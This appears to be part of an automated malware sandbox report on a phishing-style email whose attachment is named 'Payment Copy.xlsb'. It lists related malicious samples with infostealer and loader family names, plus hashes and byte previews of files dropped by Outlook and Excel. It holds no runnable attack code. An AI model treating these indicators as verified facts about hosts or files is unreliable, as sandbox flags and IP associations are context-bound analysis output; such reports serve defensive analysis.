                                                                                                                                            Reminder - you have been asked to complete a Mitek ID confirmation.emlGet hashmaliciousUnknownBrowse
                                                                                                                                            • 2.23.209.141
                                                                                                                                            https://hubs.ly/Q02WCPYS0Get hashmaliciousUnknownBrowse
                                                                                                                                            • 2.23.209.141
                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                            • 13.107.246.45
                                                                                                                                            PV2Ch2EAZe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 13.107.246.45
                                                                                                                                            WTz1CiJLNZ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 13.107.246.45
                                                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                            • 13.107.246.45
                                                                                                                                            ozuYzTKalo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 13.107.246.45
                                                                                                                                            2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                            • 13.107.246.45
                                                                                                                                            vVVLp9JVxK.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                            • 13.107.246.45
                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 13.107.246.45
                                                                                                                                            SecuriteInfo.com.W32.MSIL_Kryptik.KHA.gen.Eldorado.19300.19769.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 13.107.246.45
                                                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                                                            • 13.107.246.45
                                                                                                                                            No context
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):231348
                                                                                                                                            Entropy (8bit):4.378592256465834
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:gsgiSWgWAmiGu22qoQPzrt0FvNF24Ee7FA:gr8Ami2Dtk24Ee7G
                                                                                                                                            MD5:62BB715EB8B9D2AAA01226064FF77D28
                                                                                                                                            SHA1:6FA773AA6CD0B43447D1824ACDB1EBB5D98954C2
                                                                                                                                            SHA-256:AB420C77CF927433EF3BBF4A50162AFA5EF79D5E6CCF09114183E667D725D572
                                                                                                                                            SHA-512:6D27BAE679DD9EFCF94F7B1BDFAB28BD95BB882E6552C78FBD7D53E87AC3EE99A63546BB5E8B8B9AFB921DBA44878DC2A086565435DF6AF73015B0E83B601EEC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:TH02...... ....%d0......SM01X...,...0..%d0..........IPM.Activity...........h...............h............H..h.......nr. ...h..........w.H..h\nor ...ppDa...h.po.0...0......h.w.K...........h........_`.k...h.p.K@...I..w...h....H...8..k...0....T...............d.........2h...............k..............!h.............. h;.p.....H.....#h....8.........$h..w.....8....."h..p.......p...'h..S...........1h.w.K<.........0h....4....k../h....h......kH..hh...p........-h .......t.....+h6w.K....................... ..............F7..............FIPM.Activity.st.Form.e..Standard.tanJournal Entry.pdIPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.000Microsoft.ofThis form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):521377
                                                                                                                                            Entropy (8bit):4.9084889265453135
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                                                                            MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                                                                            SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                                                                            SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                                                                            SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                            File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):773040
                                                                                                                                            Entropy (8bit):6.55939673749297
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                                                                            MD5:4296A064B917926682E7EED650D4A745
                                                                                                                                            SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                                                                            SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                                                                            SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32768
                                                                                                                                            Entropy (8bit):0.04587332210802959
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Gtlxtjlu7rAopUSN7Sllltlxtjlu7rAopUSN7t7R9//8l1lvlll1lllwlvlllglK:GtO7pcltO7pDF9X01PH4l942wU
                                                                                                                                            MD5:1088EA933E8A28507878CF5EBF2983BB
                                                                                                                                            SHA1:77ACA6639C235EEDC72AD6335D678EAE6F993113
                                                                                                                                            SHA-256:5CC4DEABC6EC8226ADF690608DA216A2CD2CF0E1DD3E0D1DEF1B3BBA2B5696DC
                                                                                                                                            SHA-512:20BC28D5CC5A2BC1FDE2EC93858838D9E1D854D3F9051640241099AFD899C851A6F5AD83C7BC0CDD1174986402B1109CF88EF68CD798C35AEF97254FEDFEE415
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..-.......................g.^.s.#..(iq7..!w..M...-.......................g.^.s.#..(iq7..!w..M.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                            File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49472
                                                                                                                                            Entropy (8bit):0.48312787940715873
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PEHl5Q1uUll7DYMYw8zO8VFDYMDSBO8VFDYML:sFqTll4nwkjVG7jVGC
                                                                                                                                            MD5:0CB292F8479C96D069FEF7CC166062EB
                                                                                                                                            SHA1:5F020721115E69B7DB1DC5D2A7AAADAC306B1D1D
                                                                                                                                            SHA-256:07A5DF7076591610C62C549615B55AEB7106DC441803DF0FA96D5E1020BB93B1
                                                                                                                                            SHA-512:C510ED02F93DF96FECCB5332CD39B2DCD8302AF32816FBB4BEA7752A50765BB6EFC9532B386BD877FB030640515FB0D182291D64D2F42BE47A4CCD4B71297221
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:7....-..........#..(iq7....6.#fD........#..(iq7..;..r...SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:PNG image data, 832 x 443, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):224778
                                                                                                                                            Entropy (8bit):7.988999255732982
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:81Av7GR5lRVEhK7Vkmlwwzog7KRVGhxKko5Vaj:OEq7hskVkenjQIh1oC
                                                                                                                                            MD5:2AF5FBFB2EA88AAF380F8C58C6E609E7
                                                                                                                                            SHA1:0CB82E56D05E8C23E4A84409D42EEE047B98D94E
                                                                                                                                            SHA-256:838726674F144A333909217E482120FCB9E944B9FFA30C8CB7900F47FB0F4FE6
                                                                                                                                            SHA-512:79640D8D2EDFA802E2410B0CEEECFD5F98B724371145E5039C1A9AE4839A119E063317321E16ECDB2DD5DA67B6ACD2F7FC65976CF545494829246B264126CA90
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...@................sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^.........sX......`!..H.!B...XX.u7\C......w ............v...........8.7px?..>.#...^..A....#G...'[.5.p....#...V4.....`0....9...V.D9.|...I.s...3.D.F..ht..8.g|[o....S...K......q...q?w..>#tZ.QwV,.9".......u%"=.v.........\...}D.....g.3...N...w...3......s...05. r"^.D.e.......t..$".. I's8..O..#.T"..$....?*P.A.d.!..$.eE4&.$.e......]....-.......t6.^v.B..Q..?{...&.u.0.n.....#.....3a&.......|....A.......a..tSG.O......4.I#.$.?...TV.O...U>..G.U...a......ZY....I......I.w.Y.T.8.A.x.".....%........2.m[.,....p...0g..u.......loM...|a..}..."[{.3./..w.KV.go....[7..7k..0.f.g.l.a....&..A...B.....&.F..../..PA.cd5........D.p.{...... I.\.:x.?......4.}.G....G...........W/.3..&...w..a.2..E...}...a........maG.....l;_X8...a...._....m.LXg.......E~3..D~?d.,,...o.......;0,..&.....&...a.o...t..p..........?.G.e.G.U...&...o.o+........_K~..s;r.....?.9..~.....;>......._....x..
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):235202
                                                                                                                                            Entropy (8bit):7.976436646741022
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:tM1Av7GR5lRVEhK7Vkmlwwzog7KRVGhxKko5VaJf:t+Eq7hskVkenjQIh1os
                                                                                                                                            MD5:FE7F891799381EA12C9467860D3D418E
                                                                                                                                            SHA1:90E36CE92B4F83D25D3F11543B219E6D2CEDB169
                                                                                                                                            SHA-256:048B20BAE79F992E13CE1F00BB6DC3AE1998B4ADA643E9B20093826DF274F1FB
                                                                                                                                            SHA-512:C7BB5548A3FB06F84DDCA0177ACCDF8796FDE77D1104B0513D0500446A6D78F374D725356FFC064BC2683D435EF22E1DAAD55EF7203896ADCDC7D99674718B40
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK..........!.Q.&.............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#....(v..!..(...P.....c[^....:}HDmP.%.;3.3..h...@D.].|..p.k.....=....$...;....M..W..6...vX.eJ.A.TK.%r......Z&z....Z......N(...T....'..M...]%_..q.]......%..*6N..Kh.X.K... ..RE?u...}".E...n..7u./..FD..tK...{.l...xC..Q.;.=.qotX.h(.eL...dDc...6...m...a.......[`.....\$C...=:.Z.D{...D..N.~>7..W....4.........C.x.Q~....?.......~.> MW..;4kF... &..v=..Q...r..QA.}....h.5.........PK..........!.C.......L......._r
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:gAWY3n:qY3n
                                                                                                                                            MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                                                            SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                                                            SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                                                            SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[ZoneTransfer]..ZoneId=3..
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):165
                                                                                                                                            Entropy (8bit):1.4377382811115937
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:OM6X/kKwfv:OpMKwfv
                                                                                                                                            MD5:3F93DE916BC5DFF6250A3E06DD21639C
                                                                                                                                            SHA1:7084E4EACB6549015546A890606EC522143D8732
                                                                                                                                            SHA-256:E138A430F94AAE7616B202256EB819063A53B833E8AC4471B530969656C6C2A9
                                                                                                                                            SHA-512:7F7F06A998CF8CA5444F792C53AE5C228C5935ED294F077A1411F128E4DBBEEA969A6C76F4F8AF4B834F3F5E5855DC2D76541573DB409D20D3910F750E4E9D48
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.user ..n.o.r.d.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32768
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3::
                                                                                                                                            MD5:BB7DF04E1B0A2570657527A7E108AE23
                                                                                                                                            SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                                                                                                                            SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                                                                                                                            SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):147
                                                                                                                                            Entropy (8bit):5.532483588618338
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:OOr/no7zuOoSk/h4E2J5oH+fyM1KYEGNcpReLqEjO3jOjplrO1VmK+JWH+Tn:VnoeOoSc23oH+H1hVcpALqEjO3ELrOfK
                                                                                                                                            MD5:D6DB3688567A772B9E5BEC9F648741B5
                                                                                                                                            SHA1:8F9EB74D27872E1292C2031B25E607D63ABDADE0
                                                                                                                                            SHA-256:C6537622E54C4AB8A1BCDD2685D5A23960F1AA04FAA1E4D69A7A3CD6774F08A7
                                                                                                                                            SHA-512:D24C759C56FFCDEAFFAC604C538234D5C103A843D3B485B72583DAA5BC49018B56A44969F5582368E2E3BD18090C681FF46E9087DD96F53F0363688325F86BAF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:S..(}_............}...........Zfile:///C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LF0A6GI2\..Payment%20Copy..xlsb..d.
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:PNG image data, 832 x 443, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):224778
                                                                                                                                            Entropy (8bit):7.988999255732982
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:81Av7GR5lRVEhK7Vkmlwwzog7KRVGhxKko5Vaj:OEq7hskVkenjQIh1oC
                                                                                                                                            MD5:2AF5FBFB2EA88AAF380F8C58C6E609E7
                                                                                                                                            SHA1:0CB82E56D05E8C23E4A84409D42EEE047B98D94E
                                                                                                                                            SHA-256:838726674F144A333909217E482120FCB9E944B9FFA30C8CB7900F47FB0F4FE6
                                                                                                                                            SHA-512:79640D8D2EDFA802E2410B0CEEECFD5F98B724371145E5039C1A9AE4839A119E063317321E16ECDB2DD5DA67B6ACD2F7FC65976CF545494829246B264126CA90
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...@................sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^.........sX......`!..H.!B...XX.u7\C......w ............v...........8.7px?..>.#...^..A....#G...'[.5.p....#...V4.....`0....9...V.D9.|...I.s...3.D.F..ht..8.g|[o....S...K......q...q?w..>#tZ.QwV,.9".......u%"=.v.........\...}D.....g.3...N...w...3......s...05. r"^.D.e.......t..$".. I's8..O..#.T"..$....?*P.A.d.!..$.eE4&.$.e......]....-.......t6.^v.B..Q..?{...&.u.0.n.....#.....3a&.......|....A.......a..tSG.O......4.I#.$.?...TV.O...U>..G.U...a......ZY....I......I.w.Y.T.8.A.x.".....%........2.m[.,....p...0g..u.......loM...|a..}..."[{.3./..w.KV.go....[7..7k..0.f.g.l.a....&..A...B.....&.F..../..PA.cd5........D.p.{...... I.\.:x.?......4.}.G....G...........W/.3..&...w..a.2..E...}...a........maG.....l;_X8...a...._....m.LXg.......E~3..D~?d.,,...o.......;0,..&.....&...a.o...t..p..........?.G.e.G.U...&...o.o+........_K~..s;r.....?.9..~.....;>......._....x..
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):235202
                                                                                                                                            Entropy (8bit):7.976436646741022
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:tM1Av7GR5lRVEhK7Vkmlwwzog7KRVGhxKko5VaJf:t+Eq7hskVkenjQIh1os
                                                                                                                                            MD5:FE7F891799381EA12C9467860D3D418E
                                                                                                                                            SHA1:90E36CE92B4F83D25D3F11543B219E6D2CEDB169
                                                                                                                                            SHA-256:048B20BAE79F992E13CE1F00BB6DC3AE1998B4ADA643E9B20093826DF274F1FB
                                                                                                                                            SHA-512:C7BB5548A3FB06F84DDCA0177ACCDF8796FDE77D1104B0513D0500446A6D78F374D725356FFC064BC2683D435EF22E1DAAD55EF7203896ADCDC7D99674718B40
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK..........!.Q.&.............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#....(v..!..(...P.....c[^....:}HDmP.%.;3.3..h...@D.].|..p.k.....=....$...;....M..W..6...vX.eJ.A.TK.%r......Z&z....Z......N(...T....'..M...]%_..q.]......%..*6N..Kh.X.K... ..RE?u...}".E...n..7u./..FD..tK...{.l...xC..Q.;.=.qotX.h(.eL...dDc...6...m...a.......[`.....\$C...=:.Z.D{...D..N.~>7..W....4.........C.x.Q~....?.......~.> MW..;4kF... &..v=..Q...r..QA.}....h.5.........PK..........!.C.......L......._r
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:gAWY3n:qY3n
                                                                                                                                            MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                                                            SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                                                            SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                                                            SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[ZoneTransfer]..ZoneId=3..
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20971520
                                                                                                                                            Entropy (8bit):0.017157820900749503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:dUL6NZraZzQzCgtFvomX+ZvW6lUwh2SAzsDx19lxle:
                                                                                                                                            MD5:6BE7E897348C4B610E1BBFA1F2E0ED15
                                                                                                                                            SHA1:C56715B04E69CB181D0DC1B77A6B8269CC27813D
                                                                                                                                            SHA-256:CA84113EB535AF69F30F44621285D379D215FB0F6267724928CE186E4DADC203
                                                                                                                                            SHA-512:7F61394495BD07C93295E45F6EC191323110A532CC43A3F7D30CFA581BBADA4D102C2D64547E90CCB72081D6E3184FE04B06D78955B1C486BCBFD9F7C47507E6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/06/2024 15:54:59.207.EXCEL (0x19B0).0x1790.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":15,"Time":"2024-11-06T15:54:59.207Z","Contract":"Office.System.Activity","Activity.CV":"N+DLBICLt0+WJArfj2XhpQ.1.10","Activity.Duration":19,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...11/06/2024 15:54:59.222.EXCEL (0x19B0).0x1790.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":17,"Time":"2024-11-06T15:54:59.222Z","Contract":"Office.System.Activity","Activity.CV":"N+DLBICLt0+WJArfj2XhpQ.1.11","Activity.Duration":12060,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVersion"
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20971520
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3::
                                                                                                                                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:Microsoft OOXML
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3197
                                                                                                                                            Entropy (8bit):4.5706589868417975
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:9i9QW6szX9HmJGCxHQkx2UM6oPFFoLyz/:cmWtzXhC5Qkxk7/
                                                                                                                                            MD5:A3752BAB100C9E8E4B6F4804E3D51F80
                                                                                                                                            SHA1:62BB845D823D1FBE29EC04F7B0B543D12C082662
                                                                                                                                            SHA-256:7FC3D2916317C5573FCC6301CD84591FA7436260013AEB87872A9F5C33566B4B
                                                                                                                                            SHA-512:5AB99A459AD5D1809EAB965A1A8A0BD4A5750FF764C5A27E155BF7D938F7E01EF6FC2BC87F377258E4A1B850AFD56764A29DCFE88AB59AB2CAEC5FB5B0774C74
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK..........!..!..............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H...W.8p@.%.#.P...7.....}{6m...H...o<.W.iT{..ch.@a....7.y/.@......6pD.U{{So..I.:P..sz...2&.2.b...1.:..5=.z.6............. ..$.G..r^.Y...Fo.KR.......JQ.vh...$..y.7...j.w..&.$.v.sL$..X..,..E.#...'."Q*.?0v..(.w..^.\.Cw..O..~.......PK..........!...K............_rels/.rels ...(..............................................................................................................................
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                            File Type:ASCII text, with very long lines (28778), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20971520
                                                                                                                                            Entropy (8bit):0.20695242138416922
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:/ntI8bQ0TOkVNxc0pQG25yWvPEnlj7LWljqQkuFO6jYZ/3uf8JFDQuo8CCwWIwyo:BbR5NxgnQ7PNHY8ghy
                                                                                                                                            MD5:63851E79619E1D187E9D36B613466458
                                                                                                                                            SHA1:236DE4C9E693E5C9C1B5C91D22CC5469F7C12813
                                                                                                                                            SHA-256:A50CF8F7305CC201E653072C5948AFEC1DB60BFB5240874DA7A329D3C9A3844C
                                                                                                                                            SHA-512:CB220AC9D6E49219B847B84CBDB0243BA76A6CF75F3E2FF8AE625DA8B3DBB5C27197685360F96FDFED9769B7577869A7B609E43F4525BA49E596DEB6D98FB9B5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/06/2024 15:54:42.765.OUTLOOK (0xC28).0x1240.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":26,"Time":"2024-11-06T15:54:42.765Z","Contract":"Office.System.Activity","Activity.CV":"CP7O1+YFCUiykfPgT6x5Vg.4.11","Activity.Duration":13,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...11/06/2024 15:54:42.781.OUTLOOK (0xC28).0x1240.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":28,"Time":"2024-11-06T15:54:42.781Z","Contract":"Office.System.Activity","Activity.CV":"CP7O1+YFCUiykfPgT6x5Vg.4.12","Activity.Duration":10883,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVe
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20971520
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3::
                                                                                                                                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
